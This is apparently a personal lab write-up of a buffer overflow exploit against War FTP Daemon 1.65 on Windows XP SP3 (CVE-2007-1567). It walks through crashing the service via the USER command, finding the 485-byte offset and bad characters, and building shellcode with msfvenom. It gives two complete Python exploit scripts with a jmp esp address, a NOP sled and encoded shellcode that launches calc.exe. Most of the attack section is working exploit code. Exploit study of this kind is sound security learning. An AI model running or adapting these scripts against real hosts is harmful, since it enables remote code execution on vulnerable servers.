# War FTP Daemon 1.65 _ Win XP SP3 - Buffer Overflow


-   cve details: [CVE-2007-1567](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1567)
-   Target: War FTP Daemon 1.65 
-   Platform : windows xp- SP3 - Build 2600
-   Exploit : Python 2.7
-   debugger: Immunity Debugger

For run server click this button:
![](https://github.com/Creamy-Chicken-Soup/My-Writeup/blob/main/CVE-2007-1567_BOF/images/3.JPG)

If you have this error:
![](https://github.com/Creamy-Chicken-Soup/My-Writeup/blob/main/CVE-2007-1567_BOF/images/2.JPG)

clean in war ftp folder this file: FtpDaemon.dat \
I send several "A" to program but it recive a msg for send USER. I send 1000 * "A" by perfix with "USER" and program crashed. I use MONA for detect exactly BOF location and I find it fr 485. I test it and evrything is OK. I add my shellcode and "jmp esp"'s address to my exploit :

```
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))

shellcode=("\xbf\x9f\x6d\xb4\x7d\xda\xcb\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x31\x31\x7a\x13\x03\x7a\x13\x83\xea\x63\x8f\x41\x81\x73\xd2"
"\xaa\x7a\x83\xb3\x23\x9f\xb2\xf3\x50\xeb\xe4\xc3\x13\xb9\x08"
"\xaf\x76\x2a\x9b\xdd\x5e\x5d\x2c\x6b\xb9\x50\xad\xc0\xf9\xf3"
"\x2d\x1b\x2e\xd4\x0c\xd4\x23\x15\x49\x09\xc9\x47\x02\x45\x7c"
"\x78\x27\x13\xbd\xf3\x7b\xb5\xc5\xe0\xcb\xb4\xe4\xb6\x40\xef"
"\x26\x38\x85\x9b\x6e\x22\xca\xa6\x39\xd9\x38\x5c\xb8\x0b\x71"
"\x9d\x17\x72\xbe\x6c\x69\xb2\x78\x8f\x1c\xca\x7b\x32\x27\x09"
"\x06\xe8\xa2\x8a\xa0\x7b\x14\x77\x51\xaf\xc3\xfc\x5d\x04\x87"
"\x5b\x41\x9b\x44\xd0\x7d\x10\x6b\x37\xf4\x62\x48\x93\x5d\x30"
"\xf1\x82\x3b\x97\x0e\xd4\xe4\x48\xab\x9e\x08\x9c\xc6\xfc\x46"
"\x63\x54\x7b\x24\x63\x66\x84\x18\x0c\x57\x0f\xf7\x4b\x68\xda"
"\xbc\xa4\x22\x47\x94\x2c\xeb\x1d\xa5\x30\x0c\xc8\xe9\x4c\x8f"
"\xf9\x91\xaa\x8f\x8b\x94\xf7\x17\x67\xe4\x68\xf2\x87\x5b\x88"
"\xd7\xeb\x3a\x1a\xbb\xc5\xd9\x9a\x5e\x1a")


exploit="A"*485 + "\xd7\x30\x9d\x7c" + "\x90"*8 + shellcode

s.send("USER "+exploit+"\r\n")
print s.recv(1024)
s.close()

```

But My shellcode not work and something is wrong. I think myshellcode have badcharacters and I use mona and manually to find it. after several try I find this 
badcharacters: "\x00\x0a\x0d\x40". and I use msfvenum to create shellcode witout this badcharacters.

```
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe  -f c -b '\x00\x0a\x0d\x40'
```

I add it to my exploit but it Not work. I analysis it and find problem. When I send exploit with "\x90"*8 ,in the buffer show 5's NOP in the buffer. I add 3 extra
to My exploit :

```
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))

shellcode=("\xbd\x89\x6c\x2d\xbd\xdb\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x31\x31\x6b\x13\x03\x6b\x13\x83\xeb\x75\x8e\xd8\x41\x6d\xcd"
"\x23\xba\x6d\xb2\xaa\x5f\x5c\xf2\xc9\x14\xce\xc2\x9a\x79\xe2"
"\xa9\xcf\x69\x71\xdf\xc7\x9e\x32\x6a\x3e\x90\xc3\xc7\x02\xb3"
"\x47\x1a\x57\x13\x76\xd5\xaa\x52\xbf\x08\x46\x06\x68\x46\xf5"
"\xb7\x1d\x12\xc6\x3c\x6d\xb2\x4e\xa0\x25\xb5\x7f\x77\x3e\xec"
"\x5f\x79\x93\x84\xe9\x61\xf0\xa1\xa0\x1a\xc2\x5e\x33\xcb\x1b"
"\x9e\x98\x32\x94\x6d\xe0\x73\x12\x8e\x97\x8d\x61\x33\xa0\x49"
"\x18\xef\x25\x4a\xba\x64\x9d\xb6\x3b\xa8\x78\x3c\x37\x05\x0e"
"\x1a\x5b\x98\xc3\x10\x67\x11\xe2\xf6\xee\x61\xc1\xd2\xab\x32"
"\x68\x42\x11\x94\x95\x94\xfa\x49\x30\xde\x16\x9d\x49\xbd\x7c"
"\x60\xdf\xbb\x32\x62\xdf\xc3\x62\x0b\xee\x48\xed\x4c\xef\x9a"
"\x4a\xa2\xa5\x87\xfa\x2b\x60\x52\xbf\x31\x93\x88\x83\x4f\x10"
"\x39\x7b\xb4\x08\x48\x7e\xf0\x8e\xa0\xf2\x69\x7b\xc7\xa1\x8a"
"\xae\xa4\x24\x19\x32\x05\xc3\x99\xd1\x59")


exploit="A"*485 + "\xd7\x30\x9d\x7c" + "\x90"*11 + shellcode

s.send("USER "+exploit+"\r\n")
print s.recv(1024)
s.close()
```

![](https://github.com/Creamy-Chicken-Soup/My-Writeup/blob/main/CVE-2007-1567_BOF/images/1.JPG)
